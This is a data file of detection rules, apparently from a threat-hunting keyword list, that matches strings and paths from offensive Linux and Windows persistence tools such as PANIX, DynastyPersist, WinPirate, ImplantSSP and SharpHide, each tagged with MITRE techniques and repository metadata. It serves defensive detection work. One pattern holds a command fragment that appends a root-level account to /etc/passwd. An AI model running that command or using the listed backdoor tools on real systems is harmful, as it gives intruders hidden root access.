283*/var/tmp/.memory/diamorphine.c*.{0,1000}\/var\/tmp\/\.memory\/diamorphine\.c.{0,1000}offensive_tool_keywordDynastyPersistLinux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd ServiceT1055 - T1037 - T1078 - T1547 - T1546 - T1556TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Trevohack/DynastyPersist10#linuxN/A92153172024-05-16T05:19:48Z2023-08-13T15:05:42Z12415
284*/var/tmp/.memory/diamorphine.h*.{0,1000}\/var\/tmp\/\.memory\/diamorphine\.h.{0,1000}offensive_tool_keywordDynastyPersistLinux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd ServiceT1055 - T1037 - T1078 - T1547 - T1546 - T1556TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Trevohack/DynastyPersist10#linuxN/A92153172024-05-16T05:19:48Z2023-08-13T15:05:42Z12416
285*/var/www/html/dynasty_rce*.{0,1000}\/var\/www\/html\/dynasty_rce.{0,1000}offensive_tool_keywordDynastyPersistLinux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd ServiceT1055 - T1037 - T1078 - T1547 - T1546 - T1556TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Trevohack/DynastyPersist11#linuxN/A92153172024-05-16T05:19:48Z2023-08-13T15:05:42Z12418
286*/Waitfor-Persistence.git*.{0,1000}\/Waitfor\-Persistence\.git.{0,1000}offensive_tool_keywordWaitfor-PersistenceUse Waitfor.exe to maintain persistenceT1059 - T1117 - T1053.005 - T1546.013TA0002 - TA0003N/AN/APersistencehttps://github.com/3gstudent/Waitfor-Persistence11N/AN/A9154192021-04-17T01:41:42Z2017-06-07T09:33:13Z12495
287*/Waitfor-Persistence.ps1*.{0,1000}\/Waitfor\-Persistence\.ps1.{0,1000}offensive_tool_keywordWaitfor-PersistenceUse Waitfor.exe to maintain persistenceT1059 - T1117 - T1053.005 - T1546.013TA0002 - TA0003N/AN/APersistencehttps://github.com/3gstudent/Waitfor-Persistence11N/AN/A9154192021-04-17T01:41:42Z2017-06-07T09:33:13Z12496
288*/WinPirate.bat*.{0,1000}\/WinPirate\.bat.{0,1000}offensive_tool_keywordWinPirateautomated sticky keys backdoor + credentials harvestingT1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003TA0003 - TA0005 - TA0006N/AN/APersistencehttps://github.com/l3m0n/WinPirate11N/AN/A9113322016-07-17T20:02:07Z2016-07-18T03:40:13Z12635
289*/WinPirate.git*.{0,1000}\/WinPirate\.git.{0,1000}offensive_tool_keywordWinPirateautomated sticky keys backdoor + credentials harvestingT1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003TA0003 - TA0005 - TA0006N/AN/APersistencehttps://github.com/l3m0n/WinPirate11N/AN/A9113322016-07-17T20:02:07Z2016-07-18T03:40:13Z12636
290*/WMIPersistence.git*.{0,1000}\/WMIPersistence\.git.{0,1000}offensive_tool_keywordWMIPersistenceAn example of how to perform WMI Event Subscription persistence using C#T1547.008 - T1084 - T1053 - T1059.003TA0003 - TA0004 - TA0002N/AN/APersistencehttps://github.com/mdsecactivebreach/WMIPersistence11N/AN/AN/A2113302019-05-29T09:48:46Z2019-05-29T09:40:01Z12708
291*/WSAAcceptBackdoor.git*.{0,1000}\/WSAAcceptBackdoor\.git.{0,1000}offensive_tool_keywordWSAAcceptBackdoorWinsock accept() Backdoor ImplantT1574.001 - T1059 - T1213 - T1105 - T1546TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/EgeBalci/WSAAcceptBackdoor11N/AN/A102112232021-02-13T19:18:41Z2021-02-13T15:59:01Z12738
292*/wso-webshell.git*.{0,1000}\/wso\-webshell\.git.{0,1000}offensive_tool_keywordwso-webshellwso php webshellT1100 - T1027 - T1059TA0003 - TA0007N/AEMBER BEAR - SandwormPersistencehttps://github.com/mIcHyAmRaNe/wso-webshell11N/AN/A1043762112024-07-08T04:54:36Z2017-05-04T23:34:02Z12744
293*/XRulez binaries.zip*.{0,1000}\/XRulez\sbinaries\.zip.{0,1000}offensive_tool_keywordXrulezXRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.T1078 - T1105 - T1059 - T1566TA0002 - TA0003 - TA0005 - TA0011N/AN/APersistencehttps://github.com/FSecureLABS/Xrulez11N/AN/A102162452018-12-11T16:33:08Z2016-08-31T10:10:10Z12785
294*/XRulez.exe*.{0,1000}\/XRulez\.exe.{0,1000}offensive_tool_keywordXrulezXRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.T1078 - T1105 - T1059 - T1566TA0002 - TA0003 - TA0005 - TA0011N/AN/APersistencehttps://github.com/FSecureLABS/Xrulez11N/AN/A102162452018-12-11T16:33:08Z2016-08-31T10:10:10Z12786
295*/XRulez.zip*.{0,1000}\/XRulez\.zip.{0,1000}offensive_tool_keywordXrulezXRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.T1078 - T1105 - T1059 - T1566TA0002 - TA0003 - TA0005 - TA0011N/AN/APersistencehttps://github.com/FSecureLABS/Xrulez11N/AN/A102162452018-12-11T16:33:08Z2016-08-31T10:10:10Z12787
296*-:[GreenwooD]:- WinX Shell*.{0,1000}\-\:\[GreenwooD\]\:\-\sWinX\sShell.{0,1000}offensive_tool_keywordOWASP rulesOWASP repo of rules - extracted strings for detectionT1100 - T1505.003 - T1059.001TA0003N/AN/APersistencehttps://github.com/coreruleset/coreruleset/10N/Aphp title webshell71025364032025-04-22T10:55:49Z2020-05-13T11:28:52Z12846
297*:\ProgramData\demo.dll*.{0,1000}\:\\ProgramData\\demo\.dll.{0,1000}offensive_tool_keywordpersistence_demosDemos of various (also non standard) persistence methods used by malwareT1546 - T1547 - T1133 - T1053 - T1037TA0003 N/AN/APersistencehttps://github.com/hasherezade/persistence_demos10N/AN/A73221472023-03-05T17:01:14Z2017-05-16T09:08:47Z12848
298*:0:0:root:/root:/bin/bash" >> /etc/passwd*.{0,1000}\:0\:0\:root\:\/root\:\/bin\/bash\"\s\>\>\s\/etc\/passwd.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z12859
299*[ + ] Got a packet from the backdoor!*.{0,1000}\[\s\+\s\]\sGot\sa\spacket\sfrom\sthe\sbackdoor!.{0,1000}offensive_tool_keywordSandmanSandman is a NTP based backdoor for red team engagements in hardened networks.T1105 - T1027 - T1071.001TA0011 - TA0005N/AN/APersistencehttps://github.com/Idov31/Sandman10N/AN/A1087851082024-03-31T17:40:15Z2022-08-21T11:04:45Z12888
300*[ backdoor - Debug ]*.{0,1000}\[\sbackdoor\s\-\sDebug\s\].{0,1000}offensive_tool_keywordlogon_backdoorautomated sticky keys backdoorT1174 - T1078 - T1546.013TA0003N/AN/APersistencehttps://github.com/szymon1118/logon_backdoor10N/AN/A611042016-02-12T11:42:59Z2016-02-10T22:38:46Z12889
301*[-] COM Hijacking failed!*.{0,1000}\[\-\]\sCOM\sHijacking\sfailed!.{0,1000}offensive_tool_keywordpersistence_demosDemos of various (also non standard) persistence methods used by malwareT1546 - T1547 - T1133 - T1053 - T1037TA0003 N/AN/APersistencehttps://github.com/hasherezade/persistence_demos10#contentN/A73221472023-03-05T17:01:14Z2017-05-16T09:08:47Z12998
302*[-] Dropping DLL failed!*.{0,1000}\[\-\]\sDropping\sDLL\sfailed!.{0,1000}offensive_tool_keywordpersistence_demosDemos of various (also non standard) persistence methods used by malwareT1546 - T1547 - T1133 - T1053 - T1037TA0003 N/AN/APersistencehttps://github.com/hasherezade/persistence_demos10#contentN/A73221472023-03-05T17:01:14Z2017-05-16T09:08:47Z13003
303*[-] Failed to create sudoers backdoor for user *.{0,1000}\[\-\]\sFailed\sto\screate\ssudoers\sbackdoor\sfor\suser\s.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#content #linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z13007
304*[-] Hijacking failed!*.{0,1000}\[\-\]\sHijacking\sfailed!.{0,1000}offensive_tool_keywordpersistence_demosDemos of various (also non standard) persistence methods used by malwareT1546 - T1547 - T1133 - T1053 - T1037TA0003 N/AN/APersistencehttps://github.com/hasherezade/persistence_demos10#contentN/A73221472023-03-05T17:01:14Z2017-05-16T09:08:47Z13018
305*[+] - Bashrc persistence added!*.{0,1000}\[\+\]\s\-\sBashrc\spersistence\sadded!.{0,1000}offensive_tool_keywordDynastyPersistLinux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd ServiceT1055 - T1037 - T1078 - T1547 - T1546 - T1556TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Trevohack/DynastyPersist10#content #linuxN/A92153172024-05-16T05:19:48Z2023-08-13T15:05:42Z13031
306*[+] - Configuring ~/.bashrc for persistence ... *.{0,1000}\[\+\]\s\-\sConfiguring\s\~\/\.bashrc\sfor\spersistence\s\.\.\.\s.{0,1000}offensive_tool_keywordDynastyPersistLinux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd ServiceT1055 - T1037 - T1078 - T1547 - T1546 - T1556TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Trevohack/DynastyPersist10#content #linuxN/A92153172024-05-16T05:19:48Z2023-08-13T15:05:42Z13032
307*[+] - Linux header / Message Of The Day Persistence*.{0,1000}\[\+\]\s\-\sLinux\sheader\s\/\sMessage\sOf\sThe\sDay\sPersistence.{0,1000}offensive_tool_keywordDynastyPersistLinux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd ServiceT1055 - T1037 - T1078 - T1547 - T1546 - T1556TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Trevohack/DynastyPersist10#content #linuxN/A92153172024-05-16T05:19:48Z2023-08-13T15:05:42Z13033
308*[+] - Rootkit Configuration*.{0,1000}\[\+\]\s\-\sRootkit\sConfiguration.{0,1000}offensive_tool_keywordDynastyPersistLinux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd ServiceT1055 - T1037 - T1078 - T1547 - T1546 - T1556TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Trevohack/DynastyPersist10#content #linuxN/A92153172024-05-16T05:19:48Z2023-08-13T15:05:42Z13034
309*[+] - Rootkit configured successfully*.{0,1000}\[\+\]\s\-\sRootkit\sconfigured\ssuccessfully.{0,1000}offensive_tool_keywordDynastyPersistLinux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd ServiceT1055 - T1037 - T1078 - T1547 - T1546 - T1556TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Trevohack/DynastyPersist10#content #linuxN/A92153172024-05-16T05:19:48Z2023-08-13T15:05:42Z13035
310*[+] - Setting up cronjobs for persistence ... *.{0,1000}\[\+\]\s\-\sSetting\sup\scronjobs\sfor\spersistence\s\.\.\.\s.{0,1000}offensive_tool_keywordDynastyPersistLinux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd ServiceT1055 - T1037 - T1078 - T1547 - T1546 - T1556TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Trevohack/DynastyPersist10#content #linuxN/A92153172024-05-16T05:19:48Z2023-08-13T15:05:42Z13036
311*[+] - Systemd Root Level Service successfully configued!*.{0,1000}\[\+\]\s\-\sSystemd\sRoot\sLevel\sService\ssuccessfully\sconfigued!.{0,1000}offensive_tool_keywordDynastyPersistLinux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd ServiceT1055 - T1037 - T1078 - T1547 - T1546 - T1556TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Trevohack/DynastyPersist10#content #linuxN/A92153172024-05-16T05:19:48Z2023-08-13T15:05:42Z13037
312*[+] $bin backdoored successful*.{0,1000}\[\+\]\s\$bin\sbackdoored\ssuccessful.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#content #linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z13038
313*[+] $binary backdoored successful*.{0,1000}\[\+\]\s\$binary\sbackdoored\ssuccessful.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#content #linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z13039
314*[+] /etc/passwd persistence established!*.{0,1000}\[\+\]\s\/etc\/passwd\spersistence\sestablished!.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#content #linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z13040
315*[+] Adding your DLL to the LSA Security Packages registry key*.{0,1000}\[\+\]\sAdding\syour\sDLL\sto\sthe\sLSA\sSecurity\sPackages\sregistry\skey.{0,1000}offensive_tool_keywordImplantSSPInstalls a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system startT1547.008 - T1073.001 - T1055.001TA0003 - TA0005N/AN/APersistencehttps://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP10#contentN/A101014162502023-02-06T14:56:26Z2019-02-06T00:32:29Z13045
316*[+] APT persistence establis*.{0,1000}\[\+\]\sAPT\spersistence\sestablis.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#content #linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z13047
317*[+] At job persistence establish*.{0,1000}\[\+\]\sAt\sjob\spersistence\sestablish.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#content #linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z13051
318*[+] Authorized_keys persistence establish*.{0,1000}\[\+\]\sAuthorized_keys\spersistence\sestablish.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#content #linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z13059
319*[+] Backdoor user persistence establish*.{0,1000}\[\+\]\sBackdoor\suser\spersistence\sestablish.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#content #linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z13062
320*[+] Backdoor user persistence established!*.{0,1000}\[\+\]\sBackdoor\suser\spersistence\sestablished!.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#content #linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z13063
321*[+] Bind shell persistence establish*.{0,1000}\[\+\]\sBind\sshell\spersistence\sestablish.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#content #linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z13068
322*[+] Capabilities backdoor persistence establish*.{0,1000}\[\+\]\sCapabilities\sbackdoor\spersistence\sestablish.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#content #linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z13076
323*[+] COM Hijacked!*.{0,1000}\[\+\]\sCOM\sHijacked!.{0,1000}offensive_tool_keywordpersistence_demosDemos of various (also non standard) persistence methods used by malwareT1546 - T1547 - T1133 - T1053 - T1037TA0003 N/AN/APersistencehttps://github.com/hasherezade/persistence_demos10#contentN/A73221472023-03-05T17:01:14Z2017-05-16T09:08:47Z13080
324*[+] Created Elevated HKLM:*.{0,1000}\[\+\]\sCreated\sElevated\sHKLM\:.{0,1000}offensive_tool_keywordSharpStaySharpStay - .NET PersistenceT1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123TA0003N/AN/APersistencehttps://github.com/0xthirteen/SharpStay10#contentN/A105475972024-06-26T15:54:52Z2020-01-24T22:22:07Z13087
325*[+] Created malicious pre-commit hook in *.{0,1000}\[\+\]\sCreated\smalicious\spre\-commit\shook\sin\s.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#content #linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z13088
326*[+] Cron persistence established*.{0,1000}\[\+\]\sCron\spersistence\sestablished.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#content #linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z13093
327*[+] DLL dropped!*.{0,1000}\[\+\]\sDLL\sdropped!.{0,1000}offensive_tool_keywordpersistence_demosDemos of various (also non standard) persistence methods used by malwareT1546 - T1547 - T1133 - T1053 - T1037TA0003 N/AN/APersistencehttps://github.com/hasherezade/persistence_demos10#contentN/A73221472023-03-05T17:01:14Z2017-05-16T09:08:47Z13103
328*[+] Docker container persistence establish*.{0,1000}\[\+\]\sDocker\scontainer\spersistence\sestablish.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#content #linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z13104
329*[+] Elevated to SYSTEM privileges*.{0,1000}\[\+\]\sElevated\sto\sSYSTEM\sprivileges.{0,1000}offensive_tool_keywordRID-HijackingWindows RID Hijacking persistence techniqueT1174TA0003N/AN/APersistencehttps://github.com/r4wd3r/RID-Hijacking10#contentN/A92174432024-11-20T01:43:01Z2018-07-14T18:48:51Z13123
330*[+] Executing technique - hiding scheduled task*.{0,1000}\[\+\]\sExecuting\stechnique\s\-\shiding\sscheduled\stask.{0,1000}offensive_tool_keywordScheduleRunnerA C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operationT1210 - T1570 - T1021 - T1550TA0008N/AN/APersistencehttps://github.com/netero1010/ScheduleRunner10#contentN/A94336462025-01-22T02:06:59Z2021-10-12T15:27:32Z13135
331*[+] Git persistence establish*.{0,1000}\[\+\]\sGit\spersistence\sestablish.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#content #linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z13154
332*[+] init.d backdoor establish*.{0,1000}\[\+\]\sinit\.d\sbackdoor\sestablish.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#content #linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z13183
333*[+] MOTD backdoor persistence establish*.{0,1000}\[\+\]\sMOTD\sbackdoor\spersistence\sestablish.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#content #linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z13228
334*[+] Registry key set. DLL will be loaded on reboot*.{0,1000}\[\+\]\sRegistry\skey\sset\.\sDLL\swill\sbe\sloaded\son\sreboot.{0,1000}offensive_tool_keywordImplantSSPInstalls a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system startT1547.008 - T1073.001 - T1055.001TA0003 - TA0005N/AN/APersistencehttps://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP10#contentN/A101014162502023-02-06T14:56:26Z2019-02-06T00:32:29Z13282
335*[+] Removed malicious entry from pre-commit hook in *.{0,1000}\[\+\]\sRemoved\smalicious\sentry\sfrom\spre\-commit\shook\sin\s.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#content #linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z13286
336*[+] Removing scheduled task on disk artifact*.{0,1000}\[\+\]\sRemoving\sscheduled\stask\son\sdisk\sartifact.{0,1000}offensive_tool_keywordScheduleRunnerA C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operationT1210 - T1570 - T1021 - T1550TA0008N/AN/APersistencehttps://github.com/netero1010/ScheduleRunner10#contentN/A94336462025-01-22T02:06:59Z2021-10-12T15:27:32Z13287
337*[+] Safety checks passed. Implanting your DLL*.{0,1000}\[\+\]\sSafety\schecks\spassed\.\sImplanting\syour\sDLL.{0,1000}offensive_tool_keywordImplantSSPInstalls a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system startT1547.008 - T1073.001 - T1055.001TA0003 - TA0005N/AN/APersistencehttps://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP10#contentN/A101014162502023-02-06T14:56:26Z2019-02-06T00:32:29Z13298
338*[+] SharpHide running as elevated user*.{0,1000}\[\+\]\sSharpHide\srunning\sas\selevated\suser.{0,1000}offensive_tool_keywordSharpHideTool to create hidden registry keysT1112 - T1562 - T1562.001TA0005 - TA0003N/AN/APersistencehttps://github.com/outflanknl/SharpHide10#contentN/A95480962019-10-23T10:44:22Z2019-10-20T14:25:47Z13314
339*[+] SharpHide running as normal user*.{0,1000}\[\+\]\sSharpHide\srunning\sas\snormal\suser.{0,1000}offensive_tool_keywordSharpHideTool to create hidden registry keysT1112 - T1562 - T1562.001TA0005 - TA0003N/AN/APersistencehttps://github.com/outflanknl/SharpHide10#contentN/A95480962019-10-23T10:44:22Z2019-10-20T14:25:47Z13315
340*[+] SSH key persistence established!*.{0,1000}\[\+\]\sSSH\skey\spersistence\sestablished!.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#content #linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z13326
341*[+] Success! LD_PRELOAD has been added!*.{0,1000}\[\+\]\sSuccess!\sLD_PRELOAD\shas\sbeen\sadded!.{0,1000}offensive_tool_keywordDynastyPersistLinux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd ServiceT1055 - T1037 - T1078 - T1547 - T1546 - T1556TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Trevohack/DynastyPersist10#content #linuxN/A92153172024-05-16T05:19:48Z2023-08-13T15:05:42Z13334
342*[+] Systemd Generator persistence established!*.{0,1000}\[\+\]\sSystemd\sGenerator\spersistence\sestablished!.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#content #linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z13361
343*[+] The scheduled task is hidden and invisible now*.{0,1000}\[\+\]\sThe\sscheduled\stask\sis\shidden\sand\sinvisible\snow.{0,1000}offensive_tool_keywordScheduleRunnerA C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operationT1210 - T1570 - T1021 - T1550TA0008N/AN/APersistencehttps://github.com/netero1010/ScheduleRunner10#contentN/A94336462025-01-22T02:06:59Z2021-10-12T15:27:32Z13369
